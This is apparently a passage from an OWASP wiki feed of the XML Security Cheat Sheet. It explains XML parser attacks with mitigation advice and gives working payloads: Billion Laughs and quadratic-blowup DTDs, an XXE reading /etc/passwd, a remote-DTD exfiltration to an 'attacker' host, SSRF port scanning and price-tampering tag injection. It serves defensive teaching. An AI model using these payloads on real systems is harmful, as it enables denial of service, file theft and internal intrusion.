==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined as entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 (10^10) characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
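&lt;br /&gt;
The arithmetic behind this estimate can be sketched in Python. The function name &amp;lt;tt&amp;gt;quadratic_blowup_size&amp;lt;/tt&amp;gt; is hypothetical, and the calculation ignores the fixed DOCTYPE and element markup:&lt;br /&gt;

```python
def quadratic_blowup_size(entity_length, reference_count, name_length=1):
    """Return (characters sent, characters after expansion)."""
    # The long entity value appears once, in its declaration.
    # Each reference costs the entity name plus an ampersand and a semicolon.
    document_size = entity_length + reference_count * (name_length + 2)
    # Every reference is replaced by the full entity value.
    expanded_size = entity_length * reference_count
    return document_size, expanded_size


sent, expanded = quadratic_blowup_size(100_000, 100_000)
print(sent)      # 400000
print(expanded)  # 10000000000
```

Under these assumptions a document of roughly 400,000 characters expands to 10^10 characters, an amplification of about 25,000 times.&lt;br /&gt;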
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt; entities it references; each of these will in turn be resolved as 10 &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; entities, and so on. Finally, the CPU and/or memory will be affected by expanding 10^9 copies of &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, about 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
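&lt;br /&gt;
The growth of this expansion can be sketched in Python. The function name &amp;lt;tt&amp;gt;billion_laughs_size&amp;lt;/tt&amp;gt; and its parameters are hypothetical; the defaults mirror the nine levels of ten references used in the example:&lt;br /&gt;

```python
def billion_laughs_size(levels=9, fanout=10, base="LOL"):
    """Return (copies of the base entity, total characters) after expansion."""
    # Each level multiplies the number of copies by the fan-out.
    copies = fanout ** levels
    return copies, copies * len(base)


copies, characters = billion_laughs_size()
print(copies)      # 1000000000
print(characters)  # 3000000000
```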
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE soap:Envelope [&lt;br /&gt;
  &amp;lt;!ELEMENT soap:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST soap:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;soap:Envelope entityReference=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
   &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; that points to the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt; and is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, for example a file fetched via HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % '''xxe''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario: with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
  at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
  at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to a valid port will be very quick (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish in higher latency networks.&lt;br /&gt;
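&lt;br /&gt;
The averaging step can be sketched in Python as follows. The function name &amp;lt;tt&amp;gt;classify_timings&amp;lt;/tt&amp;gt;, the sample data, and the midpoint threshold are assumptions made for illustration; which group corresponds to open ports depends on the implementation being tested:&lt;br /&gt;

```python
from statistics import mean


def classify_timings(samples):
    """Label each port "fast" or "slow" from repeated timing measurements.

    samples maps a port number to a list of response times in seconds.
    """
    # Averaging several measurements smooths out network jitter.
    averages = {port: mean(times) for port, times in samples.items()}
    # Assumption: the midpoint between the extremes separates the two groups.
    threshold = (min(averages.values()) + max(averages.values())) / 2
    return {
        port: "slow" if average > threshold else "fast"
        for port, average in averages.items()
    }


# Hypothetical measurements, in seconds, for two ports.
measurements = {80: [1.0, 1.2, 0.8], 81: [60.0, 59.0, 61.0]}
print(classify_timings(measurements))  # {80: 'fast', 81: 'slow'}
```

When the averages of the two groups are close, more samples per port are needed before the labels can be trusted.&lt;br /&gt;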
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI (http, ftp, etc.). For example:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''user''' SYSTEM &amp;quot;http://'''username:password'''@example.com:8080&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;user;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;br /&gt;
[[Category:Popular]]&lt;br /&gt;
[[Category:OWASP_Breakers]]&lt;br /&gt;
{{TOC hidden}}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224445</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224445"/>
				<updated>2016-12-21T21:01:00Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, measure the time taken by a regular XML document against the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though this is not required:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
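&lt;br /&gt;
The integrity check recommended above could look like the following Python sketch. The function names &amp;lt;tt&amp;gt;sha256_of&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;schema_is_unmodified&amp;lt;/tt&amp;gt; are hypothetical, and the sketch assumes that a known good SHA-256 digest of the schema was recorded through a trusted channel:&lt;br /&gt;

```python
import hashlib
import hmac


def sha256_of(path):
    """Return the hexadecimal SHA-256 digest of the file at path."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        # Read in chunks so that large schema files are not loaded at once.
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def schema_is_unmodified(path, expected_hex):
    """Compare the current digest of the schema with the recorded one."""
    # compare_digest performs the comparison in constant time.
    return hmac.compare_digest(sha256_of(path), expected_hex.lower())
```

An application would call &amp;lt;tt&amp;gt;schema_is_unmodified&amp;lt;/tt&amp;gt; before loading the schema and refuse to validate documents when it returns false.&lt;br /&gt;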
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to open one new, empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
